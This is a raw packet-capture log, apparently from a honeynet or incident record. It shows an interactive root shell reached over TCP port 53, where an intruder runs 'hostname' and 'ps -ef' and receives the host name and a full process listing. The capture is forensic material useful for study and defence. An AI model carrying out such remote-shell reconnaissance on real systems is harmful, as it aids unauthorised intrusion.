=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:00.932479 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x4B 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48759 IpLen:20 DgmLen:61 DF ***AP*** Seq: 0xA7F89C02 Ack: 0xA47F97AC Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972194 78346076 68 6F 73 74 6E 61 6D 65 0A hostname. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:00.937456 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x4C 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13894 IpLen:20 DgmLen:62 DF ***AP*** Seq: 0xA47F97AC Ack: 0xA7F89C0B Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78346293 136972194 6E 74 65 63 31 36 2D 33 36 0A ntec16-36. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:00.960416 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48762 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA7F89C0B Ack: 0xA47F97B6 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972197 78346293 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:02.490887 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x49 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48770 IpLen:20 DgmLen:59 DF ***AP*** Seq: 0xA7F89C0B Ack: 0xA47F97B6 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972349 78346293 70 73 20 2D 65 66 0A ps -ef. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:02.509851 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x42 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13895 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA47F97B6 Ack: 0xA7F89C12 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78346451 136972349 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:02.535241 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x442 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13896 IpLen:20 DgmLen:1076 DF ***AP*** Seq: 0xA47F97B6 Ack: 0xA7F89C12 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78346453 136972349 55 49 44 20 20 20 20 20 20 20 20 50 49 44 20 20 UID PID 50 50 49 44 20 20 43 20 53 54 49 4D 45 20 54 54 PPID C STIME TT 59 20 20 20 20 20 20 20 20 20 20 54 49 4D 45 20 Y TIME 43 4D 44 0A 72 6F 6F 74 20 20 20 20 20 20 20 20 CMD.root 20 31 20 20 20 20 20 30 20 20 30 20 4F 63 74 31 1 0 0 Oct1 38 20 3F 20 20 20 20 20 20 20 20 30 30 3A 30 30 8 ? 00:00 3A 30 35 20 69 6E 69 74 20 5B 33 5D 0A 72 6F 6F :05 init [3].roo 74 20 20 20 20 20 20 20 20 20 32 20 20 20 20 20 t 2 31 20 20 30 20 4F 63 74 31 38 20 3F 20 20 20 20 1 0 Oct18 ? 20 20 20 20 30 30 3A 30 30 3A 30 30 20 5B 6B 66 00:00:00 [kf 6C 75 73 68 64 5D 0A 72 6F 6F 74 20 20 20 20 20 lushd].root 20 20 20 20 33 20 20 20 20 20 31 20 20 30 20 4F 3 1 0 O 63 74 31 38 20 3F 20 20 20 20 20 20 20 20 30 30 ct18 ? 00 3A 30 30 3A 30 31 20 5B 6B 75 70 64 61 74 65 5D :00:01 [kupdate] 0A 72 6F 6F 74 20 20 20 20 20 20 20 20 20 34 20 .root 4 20 20 20 20 31 20 20 30 20 4F 63 74 31 38 20 3F 1 0 Oct18 ? 20 20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 00:00:00 20 5B 6B 70 69 6F 64 5D 0A 72 6F 6F 74 20 20 20 [kpiod].root 20 20 20 20 20 20 35 20 20 20 20 20 31 20 20 30 5 1 0 20 4F 63 74 31 38 20 3F 20 20 20 20 20 20 20 20 Oct18 ? 
30 30 3A 30 30 3A 30 30 20 5B 6B 73 77 61 70 64 00:00:00 [kswapd 5D 0A 72 6F 6F 74 20 20 20 20 20 20 20 20 20 36 ].root 6 20 20 20 20 20 31 20 20 30 20 4F 63 74 31 38 20 1 0 Oct18 3F 20 20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 ? 00:00:0 30 20 5B 6D 64 72 65 63 6F 76 65 72 79 64 5D 0A 0 [mdrecoveryd]. 62 69 6E 20 20 20 20 20 20 20 20 33 36 30 20 20 bin 360 20 20 20 31 20 20 30 20 4F 63 74 31 38 20 3F 20 1 0 Oct18 ? 20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 20 00:00:00 70 6F 72 74 6D 61 70 0A 72 6F 6F 74 20 20 20 20 portmap.root 20 20 20 33 37 35 20 20 20 20 20 31 20 20 30 20 375 1 0 4F 63 74 31 38 20 3F 20 20 20 20 20 20 20 20 30 Oct18 ? 0 30 3A 30 30 3A 30 30 20 5B 6C 6F 63 6B 64 5D 0A 0:00:00 [lockd]. 72 6F 6F 74 20 20 20 20 20 20 20 33 37 36 20 20 root 376 20 33 37 35 20 20 30 20 4F 63 74 31 38 20 3F 20 375 0 Oct18 ? 20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 20 00:00:00 5B 72 70 63 69 6F 64 5D 0A 72 6F 6F 74 20 20 20 [rpciod].root 20 20 20 20 33 38 35 20 20 20 20 20 31 20 20 30 385 1 0 20 4F 63 74 31 38 20 3F 20 20 20 20 20 20 20 20 Oct18 ? 30 30 3A 30 30 3A 30 30 20 72 70 63 2E 73 74 61 00:00:00 rpc.sta 74 64 0A 72 6F 6F 74 20 20 20 20 20 20 20 33 39 td.root 39 39 20 20 20 20 20 31 20 20 30 20 4F 63 74 31 38 9 1 0 Oct18 20 3F 20 20 20 20 20 20 20 20 30 30 3A 30 30 3A ? 00:00: 30 30 20 5B 61 70 6D 64 5D 0A 72 6F 6F 74 20 20 00 [apmd].root 20 20 20 20 20 34 38 31 20 20 20 20 20 31 20 20 481 1 30 20 4F 63 74 31 38 20 3F 20 20 20 20 20 20 20 0 Oct18 ? 20 30 30 3A 30 30 3A 35 30 20 73 79 73 6C 6F 67 00:00:50 syslog 64 20 2D 72 20 2D 6D 20 30 0A 72 6F 6F 74 20 20 d -r -m 0.root 20 20 20 20 20 34 39 30 20 20 20 20 20 31 20 20 490 1 30 20 4F 63 74 31 38 20 3F 20 20 20 20 20 20 20 0 Oct18 ? 20 30 30 3A 30 30 3A 30 30 20 6B 6C 6F 67 64 0A 00:00:00 klogd. 6E 6F 62 6F 64 79 20 20 20 20 20 35 30 34 20 20 nobody 504 20 20 20 31 20 20 30 20 4F 63 74 31 38 20 3F 20 1 0 Oct18 ? 
20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 20 00:00:00 69 64 65 6E 74 64 20 2D 65 20 2D 6F 0A 6E 6F 62 identd -e -o.nob 6F 64 79 20 20 20 20 20 35 30 38 20 20 20 35 30 ody 508 50 34 20 20 30 20 4F 63 74 31 38 20 3F 20 20 20 20 4 0 Oct18 ? 20 20 20 20 30 30 3A 30 30 3A 30 30 20 69 64 65 00:00:00 ide 6E 74 64 20 2D 65 20 2D 6F 0A 6E 6F 62 6F 64 79 ntd -e -o.nobody 20 20 20 20 20 35 30 39 20 20 20 35 30 38 20 20 509 508 30 20 4F 63 74 31 38 20 3F 20 20 20 20 20 20 20 0 Oct18 ? 20 30 30 3A 30 30 3A 30 30 20 69 64 65 6E 74 64 00:00:00 identd 20 2D 65 20 2D 6F 0A 6E 6F 62 6F 64 79 20 20 20 -e -o.nobody 20 20 35 31 30 20 20 20 35 30 38 20 20 30 20 4F 510 508 0 O 63 74 31 38 20 3F 20 20 20 20 20 20 20 20 30 30 ct18 ? 00 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:02.553846 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x442 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13897 IpLen:20 DgmLen:1076 DF ***AP*** Seq: 0xA47F9BB6 Ack: 0xA7F89C12 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78346455 136972349 3A 30 30 3A 30 30 20 69 64 65 6E 74 64 20 2D 65 :00:00 identd -e 20 2D 6F 0A 6E 6F 62 6F 64 79 20 20 20 20 20 35 -o.nobody 5 31 31 20 20 20 35 30 38 20 20 30 20 4F 63 74 31 11 508 0 Oct1 38 20 3F 20 20 20 20 20 20 20 20 30 30 3A 30 30 8 ? 00:00 3A 30 30 20 69 64 65 6E 74 64 20 2D 65 20 2D 6F :00 identd -e -o 0A 64 61 65 6D 6F 6E 20 20 20 20 20 35 32 36 20 .daemon 526 20 20 20 20 31 20 20 30 20 4F 63 74 31 38 20 3F 1 0 Oct18 ? 20 20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 00:00:00 20 2F 75 73 72 2F 73 62 69 6E 2F 61 74 64 0A 72 /usr/sbin/atd.r 6F 6F 74 20 20 20 20 20 20 20 35 34 30 20 20 20 oot 540 20 20 31 20 20 30 20 4F 63 74 31 38 20 3F 20 20 1 0 Oct18 ? 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 20 63 00:00:00 c 72 6F 6E 64 0A 72 6F 6F 74 20 20 20 20 20 20 20 rond.root 35 37 30 20 20 20 20 20 31 20 20 30 20 4F 63 74 570 1 0 Oct 31 38 20 3F 20 20 20 20 20 20 20 20 30 30 3A 30 18 ? 
00:0 30 3A 30 30 20 69 6E 65 74 64 0A 72 6F 6F 74 20 0:00 inetd.root 20 20 20 20 20 20 35 39 34 20 20 20 20 20 31 20 594 1 20 30 20 4F 63 74 31 38 20 3F 20 20 20 20 20 20 0 Oct18 ? 20 20 30 30 3A 30 30 3A 30 34 20 2F 75 73 72 2F 00:00:04 /usr/ 73 62 69 6E 2F 73 73 68 64 0A 72 6F 6F 74 20 20 sbin/sshd.root 20 20 20 20 20 36 30 39 20 20 20 20 20 31 20 20 609 1 30 20 4F 63 74 31 38 20 3F 20 20 20 20 20 20 20 0 Oct18 ? 20 30 30 3A 30 30 3A 30 30 20 6C 70 64 0A 72 6F 00:00:00 lpd.ro 6F 74 20 20 20 20 20 20 20 36 35 37 20 20 20 20 ot 657 20 31 20 20 30 20 4F 63 74 31 38 20 3F 20 20 20 1 0 Oct18 ? 20 20 20 20 20 30 30 3A 30 30 3A 30 31 20 73 65 00:00:01 se 6E 64 6D 61 69 6C 3A 20 61 63 63 65 70 74 69 6E ndmail: acceptin 67 20 63 6F 6E 6E 65 63 74 69 6F 6E 73 20 0A 72 g connections .r 6F 6F 74 20 20 20 20 20 20 20 36 37 32 20 20 20 oot 672 20 20 31 20 20 30 20 4F 63 74 31 38 20 3F 20 20 1 0 Oct18 ? 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 20 67 00:00:00 g 70 6D 20 2D 74 20 70 73 2F 32 0A 72 6F 6F 74 20 pm -t ps/2.root 20 20 20 20 20 20 36 38 36 20 20 20 20 20 31 20 686 1 20 30 20 4F 63 74 31 38 20 3F 20 20 20 20 20 20 0 Oct18 ? 20 20 30 30 3A 30 30 3A 30 30 20 68 74 74 70 64 00:00:00 httpd 0A 78 66 73 20 20 20 20 20 20 20 20 37 36 35 20 .xfs 765 20 20 20 20 31 20 20 30 20 4F 63 74 31 38 20 3F 1 0 Oct18 ? 20 20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 00:00:00 20 78 66 73 20 2D 64 72 6F 70 70 72 69 76 20 2D xfs -droppriv - 64 61 65 6D 6F 6E 20 2D 70 6F 72 74 20 2D 31 0A daemon -port -1. 72 6F 6F 74 20 20 20 20 20 20 20 37 38 30 20 20 root 780 20 20 20 31 20 20 30 20 4F 63 74 31 38 20 3F 20 1 0 Oct18 ? 20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 20 00:00:00 72 68 6E 73 64 20 2D 2D 69 6E 74 65 72 76 61 6C rhnsd --interval 20 31 32 30 0A 72 6F 6F 74 20 20 20 20 20 20 20 120.root 38 33 32 20 20 20 20 20 31 20 20 30 20 4F 63 74 832 1 0 Oct 31 38 20 3F 20 20 20 20 20 20 20 20 30 30 3A 30 18 ? 
00:0 30 3A 30 30 20 79 70 62 69 6E 64 0A 72 6F 6F 74 0:00 ypbind.root 20 20 20 20 20 20 20 38 33 34 20 20 20 38 33 32 834 832 20 20 30 20 4F 63 74 31 38 20 3F 20 20 20 20 20 0 Oct18 ? 20 20 20 30 30 3A 30 30 3A 30 30 20 79 70 62 69 00:00:00 ypbi 6E 64 0A 72 6F 6F 74 20 20 20 20 20 20 20 38 33 nd.root 83 35 20 20 20 38 33 34 20 20 30 20 4F 63 74 31 38 5 834 0 Oct18 20 3F 20 20 20 20 20 20 20 20 30 30 3A 30 30 3A ? 00:00: 30 30 20 79 70 62 69 6E 64 0A 72 6F 6F 74 20 20 00 ypbind.root 20 20 20 20 20 38 33 38 20 20 20 38 33 34 20 20 838 834 30 20 4F 63 74 31 38 20 3F 20 20 20 20 20 20 20 0 Oct18 ? 20 30 30 3A 30 30 3A 30 32 20 79 70 62 69 6E 64 00:00:02 ypbind 0A 72 6F 6F 74 20 20 20 20 20 20 20 38 38 34 20 .root 884 20 20 20 20 31 20 20 30 20 4F 63 74 31 38 20 3F 1 0 Oct18 ? 20 20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 00:00:00 20 2F 75 73 72 2F 73 62 69 6E 2F 61 75 74 6F 6D /usr/sbin/autom 6F 75 6E 74 20 2D 2D 74 69 6D 65 6F 75 74 20 36 ount --timeout 6 30 0A 72 6F 6F 74 20 20 20 20 20 20 20 38 38 39 0.root 889 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:02.555120 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48774 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA7F89C12 Ack: 0xA47F9FB6 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972353 78346453 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:02.572890 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x442 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13899 IpLen:20 DgmLen:1076 DF ***AP*** Seq: 0xA47F9FB6 Ack: 0xA7F89C12 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78346457 136972353 20 20 20 20 20 31 20 20 30 20 4F 63 74 31 38 20 1 0 Oct18 74 74 79 31 20 20 20 20 20 30 30 3A 30 30 3A 30 tty1 00:00:0 30 20 5B 6D 69 6E 67 65 74 74 79 5D 0A 72 6F 6F 0 [mingetty].roo 74 20 20 20 20 20 20 20 38 39 30 20 20 20 20 20 t 890 31 20 20 30 20 4F 63 
74 31 38 20 74 74 79 32 20 1 0 Oct18 tty2 20 20 20 20 30 30 3A 30 30 3A 30 30 20 5B 6D 69 00:00:00 [mi 6E 67 65 74 74 79 5D 0A 72 6F 6F 74 20 20 20 20 ngetty].root 20 20 20 38 39 31 20 20 20 20 20 31 20 20 30 20 891 1 0 4F 63 74 31 38 20 74 74 79 33 20 20 20 20 20 30 Oct18 tty3 0 30 3A 30 30 3A 30 30 20 5B 6D 69 6E 67 65 74 74 0:00:00 [mingett 79 5D 0A 72 6F 6F 74 20 20 20 20 20 20 20 38 39 y].root 89 32 20 20 20 20 20 31 20 20 30 20 4F 63 74 31 38 2 1 0 Oct18 20 74 74 79 34 20 20 20 20 20 30 30 3A 30 30 3A tty4 00:00: 30 30 20 5B 6D 69 6E 67 65 74 74 79 5D 0A 72 6F 00 [mingetty].ro 6F 74 20 20 20 20 20 20 20 38 39 33 20 20 20 20 ot 893 20 31 20 20 30 20 4F 63 74 31 38 20 74 74 79 35 1 0 Oct18 tty5 20 20 20 20 20 30 30 3A 30 30 3A 30 30 20 5B 6D 00:00:00 [m 69 6E 67 65 74 74 79 5D 0A 72 6F 6F 74 20 20 20 ingetty].root 20 20 20 20 38 39 34 20 20 20 20 20 31 20 20 30 894 1 0 20 4F 63 74 31 38 20 74 74 79 36 20 20 20 20 20 Oct18 tty6 30 30 3A 30 30 3A 30 30 20 5B 6D 69 6E 67 65 74 00:00:00 [minget 74 79 5D 0A 6E 6F 62 6F 64 79 20 20 20 20 33 35 ty].nobody 35 32 34 20 20 20 36 38 36 20 20 30 20 4F 63 74 32 24 686 0 Oct2 31 20 3F 20 20 20 20 20 20 20 20 30 30 3A 30 30 1 ? 00:00 3A 30 30 20 68 74 74 70 64 0A 6E 6F 62 6F 64 79 :00 httpd.nobody 20 20 20 20 33 35 32 35 20 20 20 36 38 36 20 20 3525 686 30 20 4F 63 74 32 31 20 3F 20 20 20 20 20 20 20 0 Oct21 ? 20 30 30 3A 30 30 3A 30 30 20 68 74 74 70 64 0A 00:00:00 httpd. 6E 6F 62 6F 64 79 20 20 20 20 33 35 32 36 20 20 nobody 3526 20 36 38 36 20 20 30 20 4F 63 74 32 31 20 3F 20 686 0 Oct21 ? 20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 20 00:00:00 68 74 74 70 64 0A 6E 6F 62 6F 64 79 20 20 20 20 httpd.nobody 33 35 32 37 20 20 20 36 38 36 20 20 30 20 4F 63 3527 686 0 Oc 74 32 31 20 3F 20 20 20 20 20 20 20 20 30 30 3A t21 ? 00: 30 30 3A 30 30 20 68 74 74 70 64 0A 6E 6F 62 6F 00:00 httpd.nobo 64 79 20 20 20 20 33 35 32 38 20 20 20 36 38 36 dy 3528 686 20 20 30 20 4F 63 74 32 31 20 3F 20 20 20 20 20 0 Oct21 ? 
20 20 20 30 30 3A 30 30 3A 30 30 20 68 74 74 70 00:00:00 http 64 0A 6E 6F 62 6F 64 79 20 20 20 20 33 35 32 39 d.nobody 3529 20 20 20 36 38 36 20 20 30 20 4F 63 74 32 31 20 686 0 Oct21 3F 20 20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 ? 00:00:0 30 20 68 74 74 70 64 0A 6E 6F 62 6F 64 79 20 20 0 httpd.nobody 20 20 33 35 33 30 20 20 20 36 38 36 20 20 30 20 3530 686 0 4F 63 74 32 31 20 3F 20 20 20 20 20 20 20 20 30 Oct21 ? 0 30 3A 30 30 3A 30 30 20 68 74 74 70 64 0A 6E 6F 0:00:00 httpd.no 62 6F 64 79 20 20 20 20 33 35 33 33 20 20 20 36 body 3533 6 38 36 20 20 30 20 4F 63 74 32 31 20 3F 20 20 20 86 0 Oct21 ? 20 20 20 20 20 30 30 3A 30 30 3A 30 30 20 68 74 00:00:00 ht 74 70 64 0A 72 6F 6F 74 20 20 20 20 20 31 35 37 tpd.root 157 34 30 20 20 20 35 39 34 20 20 30 20 31 31 3A 35 40 594 0 11:5 37 20 3F 20 20 20 20 20 20 20 20 30 30 3A 30 30 7 ? 00:00 3A 30 30 20 2F 75 73 72 2F 73 62 69 6E 2F 73 73 :00 /usr/sbin/ss 68 64 0A 73 68 6C 61 6D 20 20 20 20 31 35 37 34 hd.shlam 1574 34 20 31 35 37 34 30 20 20 30 20 31 31 3A 35 37 4 15740 0 11:57 20 70 74 73 2F 30 20 20 20 20 30 30 3A 30 30 3A pts/0 00:00: 30 30 20 2D 74 63 73 68 0A 72 6F 6F 74 20 20 20 00 -tcsh.root 20 20 31 35 37 39 37 20 20 20 35 39 34 20 20 30 15797 594 0 20 31 32 3A 33 33 20 3F 20 20 20 20 20 20 20 20 12:33 ? 
30 30 3A 30 30 3A 30 30 20 2F 75 73 72 2F 73 62 00:00:00 /usr/sb 69 6E 2F 73 73 68 64 0A 73 68 6C 61 6D 20 20 20 in/sshd.shlam 20 31 35 37 39 38 20 31 35 37 39 37 20 20 30 20 15798 15797 0 31 32 3A 33 33 20 70 74 73 2F 31 20 20 20 20 30 12:33 pts/1 0 30 3A 30 30 3A 30 30 20 2D 74 63 73 68 0A 72 6F 0:00:00 -tcsh.ro 6F 74 20 20 20 20 20 31 35 38 36 35 20 31 35 37 ot 15865 157 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:02.644803 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48779 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA7F89C12 Ack: 0xA47FA3B6 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972360 78346457 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:02.644911 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x12A 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13900 IpLen:20 DgmLen:284 DF ***AP*** Seq: 0xA47FA3B6 Ack: 0xA7F89C12 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78346464 136972360 39 38 20 20 30 20 31 32 3A 33 38 20 70 74 73 2F 98 0 12:38 pts/ 31 20 20 20 20 30 30 3A 30 30 3A 30 30 20 2D 62 1 00:00:00 -b 69 6E 2F 74 63 73 68 0A 72 6F 6F 74 20 20 20 20 in/tcsh.root 20 31 35 38 38 38 20 20 20 20 20 31 20 20 30 20 15888 1 0 31 32 3A 33 39 20 3F 20 20 20 20 20 20 20 20 30 12:39 ? 0 30 3A 30 30 3A 30 30 20 2F 62 69 6E 2F 73 68 0A 0:00:00 /bin/sh. 72 6F 6F 74 20 20 20 20 20 31 35 38 39 31 20 31 root 15891 1 35 38 36 35 20 20 30 20 31 32 3A 34 30 20 70 74 5865 0 12:40 pt 73 2F 31 20 20 20 20 30 30 3A 30 30 3A 30 30 20 s/1 00:00:00 74 63 70 64 75 6D 70 20 2D 73 20 32 30 30 30 20 tcpdump -s 2000 2D 77 20 62 69 6E 64 64 75 6D 70 20 70 6F 72 74 -w binddump port 0A 72 6F 6F 74 20 20 20 20 20 31 35 38 39 37 20 .root 15897 31 35 38 38 38 20 20 30 20 31 32 3A 34 31 20 3F 15888 0 12:41 ? 20 20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 00:00:00 20 70 73 20 2D 65 66 0A ps -ef. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:02.664596 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48781 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA7F89C12 Ack: 0xA47FA49E Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972362 78346464 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:03.945238 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x47 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48786 IpLen:20 DgmLen:57 DF ***AP*** Seq: 0xA7F89C12 Ack: 0xA47FA49E Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972490 78346464 71 75 69 74 0A quit. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:03.950050 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x63 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13901 IpLen:20 DgmLen:85 DF ***AP*** Seq: 0xA47FA49E Ack: 0xA7F89C17 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78346595 136972490 2F 62 69 6E 2F 73 68 3A 20 71 75 69 74 3A 20 63 /bin/sh: quit: c 6F 6D 6D 61 6E 64 20 6E 6F 74 20 66 6F 75 6E 64 ommand not found 0A . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:03.973148 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48789 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA7F89C17 Ack: 0xA47FA4BF Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972493 78346595 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:05.154447 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x47 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48794 IpLen:20 DgmLen:57 DF ***AP*** Seq: 0xA7F89C17 Ack: 0xA47FA4BF Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972610 78346595 71 75 69 74 0A quit. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:05.156361 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x63 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13902 IpLen:20 DgmLen:85 DF ***AP*** Seq: 0xA47FA4BF Ack: 0xA7F89C1C Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78346715 136972610 2F 62 69 6E 2F 73 68 3A 20 71 75 69 74 3A 20 63 /bin/sh: quit: c 6F 6D 6D 61 6E 64 20 6E 6F 74 20 66 6F 75 6E 64 ommand not found 0A . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:05.184881 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48797 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA7F89C1C Ack: 0xA47FA4E0 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972613 78346715 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:05.929413 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x47 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48802 IpLen:20 DgmLen:57 DF ***AP*** Seq: 0xA7F89C1C Ack: 0xA47FA4E0 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972687 78346715 65 78 69 74 0A exit. 
